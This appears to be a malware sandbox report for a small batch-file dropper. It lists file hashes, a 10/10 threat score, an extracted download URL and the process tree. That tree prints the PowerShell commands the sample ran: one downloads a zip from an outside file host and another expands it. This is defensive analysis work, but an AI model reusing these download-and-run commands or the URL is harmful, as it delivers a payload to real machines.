1f2ddc6098fc1879106e8651c5c3c629104f994272b4fa1a04d67c8a723925ec | Triage

Analysis

max time kernel
2s
max time network
8s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
21-10-2023 18:27

Sharing

Report Analysis Logs

General

Target

tesy - Copy (14).bat
Size

702B
MD5

65f016a2abe40d2902c7032438a14bd7
SHA1

b3537668ca1bb826e5085aee38b3f7ec654d606e
SHA256

153b384b64bd371e0236c8497c9706db00cc102f068ea8fd4569d20b3b5a6fd8
SHA512

b52486cdc585277de12287b4b2ab17c9e401bfeaee78555fd6d8760d7954b4e361f6e3ec32e4d694ba2cfa69d3d843d0f192539f0c893500b801c05a13b488f7

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip

Signatures

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (14).bat"
1⤵
PID:972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip', 'test.zip')"
  2⤵
  PID:212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"
  2⤵
  PID:648

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3dewch44.h4d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/212-0-0x000001D7D06C0000-0x000001D7D06E2000-memory.dmp

Filesize
136KB

Download
memory/212-10-0x00007FFD19C90000-0x00007FFD1A751000-memory.dmp

Filesize
10.8MB

Download
memory/212-11-0x000001D7B7780000-0x000001D7B7790000-memory.dmp

Filesize
64KB

Download
memory/212-12-0x000001D7B7780000-0x000001D7B7790000-memory.dmp

Filesize
64KB

Download
memory/212-13-0x000001D7B7780000-0x000001D7B7790000-memory.dmp

Filesize
64KB

Download